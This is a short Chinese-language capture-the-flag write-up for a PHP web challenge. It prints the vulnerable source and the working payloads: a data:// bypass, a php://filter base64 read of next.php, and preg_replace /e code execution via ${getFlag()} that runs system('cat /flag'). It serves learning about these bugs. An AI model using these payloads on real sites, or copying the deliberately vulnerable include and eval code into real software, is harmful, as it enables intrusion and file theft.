原理
关于preg_replace \e的代码执行
双引号和单引号的区别
可变变量
解题过程
代码审计
<?php
error_reporting(0);
$text = $_GET["text"];
$file = $_GET["file"];
if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){
echo "<br><h1>".file_get_contents($text,'r')."</h1></br>";
if(preg_match("/flag/",$file)){
die("Not now!");
}
include($file); //next.php
}
else{
highlight_file(__FILE__);
}
?>
绕过file_get_contents($text,'r')==="I have a dream"的payload:text=data:text/plain,I have a dream
接着读取next.php内容的payload:file=php://filter/read=convert.base64-encode/resource=next.php
拿到源码
<?php
$id = $_GET['id'];
$_SESSION['id'] = $id;
function complex($re, $str) {
return preg_replace(
'/(' . $re . ')/ei',
'strtolower("\\1")',
$str
);
}
foreach($_GET as $re => $str) {
echo complex($re, $str). "\n";
}
function getFlag(){
@eval($_GET['cmd']);
}
这里涉及preg_replace的代码执行
payload为
next.php?id=aa&\S=${getFlag()}&cmd=system("ls /");
next.php?id=aa&\S=${getFlag()}&cmd=system("cat /flag");
参考文章:https://blog.csdn.net/m0_64815693/article/details/130327529
https://www.php.net/manual/zh/language.variables.variable.php
https://xz.aliyun.com/t/2557